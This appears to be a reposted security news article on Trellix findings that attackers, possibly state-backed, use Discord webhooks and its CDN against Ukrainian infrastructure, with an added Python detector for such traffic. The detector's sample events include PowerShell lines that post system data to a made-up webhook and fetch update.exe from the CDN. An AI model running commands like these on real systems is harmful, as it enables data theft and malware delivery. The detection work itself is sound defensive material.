
Discord: A Playground for Nation-State Hackers Targeting Critical Infrastructure

By justmattg, October 17, 2023


Oct 17, 2023 | Newsroom | Malware / APT


In the latest evolution of threat actors abusing legitimate infrastructure for nefarious ends, new findings show that nation-state hacking groups have also begun leveraging Discord to target critical infrastructure.

    Discord, in recent years, has become a lucrative target, acting as a fertile ground for hosting malware using its content delivery network (CDN) as well as allowing information stealers to siphon sensitive data off the app and facilitating data exfiltration by means of webhooks.

    “The usage of Discord is largely limited to information stealers and grabbers that anyone can buy or download from the Internet,” Trellix researchers Ernesto Fernández Provecho and David Pastor Sanz said in a Monday report.


But that may be changing: the cybersecurity firm said it found evidence of an artifact targeting Ukrainian critical infrastructure. There is currently no evidence linking it to a known threat group.

“The potential emergence of APT malware campaigns exploiting Discord’s functionalities introduces a new layer of complexity to the threat landscape,” the researchers noted.

    The sample is a Microsoft OneNote file distributed via an email message impersonating the non-profit dobro.ua.

Once opened, the file displays references to Ukrainian soldiers to trick recipients into “donating” by clicking a booby-trapped button. The click executes embedded Visual Basic Script (VBS), which extracts and runs a PowerShell script; that script in turn downloads a second PowerShell script from a GitHub repository.


In the final stage, that second PowerShell script exfiltrates system metadata by posting it to a Discord webhook.

    “The fact that the only goal of the final payload is obtaining information about the system indicates that the campaign is still in an early stage, which also fits with the usage of Discord as [command-and-control],” the researchers said.

    “However, it is important to highlight that the actor could deliver a more sophisticated piece of malware to the compromised systems in the future by modifying the file stored in the GitHub repository.”


Trellix’s analysis further revealed that loaders such as SmokeLoader, PrivateLoader, and GuLoader are among the most prevalent malware families that use Discord’s CDN to fetch a next-stage payload, and that those payloads include stealers such as RedLine, Vidar, Agent Tesla, and Umbral.

    On top of that, some of the common malware families that have been observed using Discord webhooks are Mercurial Grabber, Stealerium, Typhon Stealer, and Venom RAT.
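The two abuses described above, a script stage posting host data to a Discord webhook and loaders pulling their next stage from the Discord CDN, both leave a recognisable URL shape in command-line and PowerShell script-block telemetry. The Python below is an added example for this page, not code from Trellix, Discord, or any of the malware families named; the log events, webhook IDs, tokens, and file names in it are constructed, and the lists of "Discord client" and "script host" process names are assumptions about which processes are legitimately expected to reach those endpoints on a managed host.

```python
import re
from typing import Dict, List

# URL shapes of the two Discord features the article says are abused:
# webhooks (data exfiltration / C2 channel) and CDN attachments (payload hosting).
# The shapes follow Discord's public API and CDN layout; the id/token values in the
# sample data further down are made up.
WEBHOOK_RE = re.compile(
    r"https?://(?:ptb\.|canary\.)?discord(?:app)?\.com/api/(?:v\d+/)?webhooks/"
    r"(?P<id>\d+)/(?P<token>[A-Za-z0-9_-]+)",
    re.IGNORECASE,
)
CDN_RE = re.compile(
    r"https?://(?:cdn|media)\.discordapp\.(?:com|net)/attachments/\d+/\d+/"
    r"(?P<name>[^\s\"'<>)]+)",
    re.IGNORECASE,
)

# Assumption: only the official client should talk to Discord unattended.
DISCORD_CLIENT_PROCESSES = {"discord.exe", "discordptb.exe", "discordcanary.exe"}
# Assumption: script hosts from which a dropper chain like OneNote -> VBS -> PowerShell runs.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe", "onenote.exe"}
# File types that are a next-stage payload rather than a chat attachment.
PAYLOAD_EXTENSIONS = (".exe", ".dll", ".ps1", ".vbs", ".bat", ".cmd", ".js", ".hta", ".scr", ".zip")


def detect(event: Dict[str, str]) -> List[Dict[str, str]]:
    """Return a list of detections for one endpoint event.

    event = {"process": image name, "text": command line or script-block text}
    Only plain-text URLs are matched: base64- or concatenation-obfuscated URLs are
    only caught if the decoded script text reaches the log (PowerShell 4104 events).
    """
    process = event["process"].lower()
    text = event["text"]
    hits: List[Dict[str, str]] = []
    if process in DISCORD_CLIENT_PROCESSES:
        return hits  # the client itself uses these endpoints constantly; no signal here

    for m in WEBHOOK_RE.finditer(text):
        # Whoever holds a webhook token can post to (or delete) that webhook, so the
        # alert carries only a prefix; the full URL stays in the raw event.
        hits.append({
            "rule": "discord_webhook_from_non_client",
            "severity": "high" if process in SCRIPT_HOSTS else "medium",
            "indicator": f"webhook id {m.group('id')}, token {m.group('token')[:4]}...",
        })

    for m in CDN_RE.finditer(text):
        name = m.group("name").split("?")[0].lower()
        if name.endswith(PAYLOAD_EXTENSIONS):
            hits.append({
                "rule": "discord_cdn_payload_download",
                "severity": "high",
                "indicator": m.group(0),
            })
    return hits


# Constructed sample telemetry (not real log data).
SAMPLE_EVENTS = [
    # 0: PowerShell posting host data to a webhook, the final stage the article describes
    {"process": "powershell.exe",
     "text": 'Invoke-RestMethod -Method Post -Uri "https://discord.com/api/webhooks/'
             '1122334455667788990/aBcDeFgHiJkLmNoPqRsTuVwXyZ0123456789" -Body $json'},
    # 1: PowerShell fetching a next stage from the CDN, the loader pattern
    {"process": "powershell.exe",
     "text": "Invoke-WebRequest https://cdn.discordapp.com/attachments/111111111111111111/"
             "222222222222222222/update.exe -OutFile $env:TEMP\\update.exe"},
    # 2: the Discord client fetching an image attachment: benign
    {"process": "Discord.exe",
     "text": "GET https://cdn.discordapp.com/attachments/333333333333333333/444444444444444444/photo.png"},
    # 3: a browser downloading a PDF attachment: no payload extension, no alert
    {"process": "chrome.exe",
     "text": "GET https://cdn.discordapp.com/attachments/555555555555555555/666666666666666666/report.pdf"},
    # 4: unrelated PowerShell activity
    {"process": "powershell.exe",
     "text": "Get-Process | Sort-Object CPU -Descending | Select-Object -First 5"},
]


def run(events=SAMPLE_EVENTS):
    """Evaluate every event and return (event index, rule, severity) tuples."""
    return [(i, h["rule"], h["severity"]) for i, e in enumerate(events) for h in detect(e)]


if __name__ == "__main__":
    for row in run():
        print(row)
```

Running this over the constructed events flags only events 0 and 1; the client's own CDN traffic and a browser's document download produce nothing, which is the point of keying on the originating process rather than on the domain alone. In practice the same rules are more useful as a Sigma or EDR query over command-line and script-block logs than as a standalone script, and they should be paired with an egress rule, since a host that never needs Discord has no reason to reach either endpoint at all.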

    “The abuse of Discord’s CDN as a distribution mechanism for additional malware payloads showcases the adaptability of cybercriminals to exploit collaborative applications for their gain,” the researchers said.

    “APTs are known for their sophisticated and targeted attacks, and by infiltrating widely used communication platforms like Discord, they can efficiently establish long-term footholds within networks, putting critical infrastructure and sensitive data at risk.”
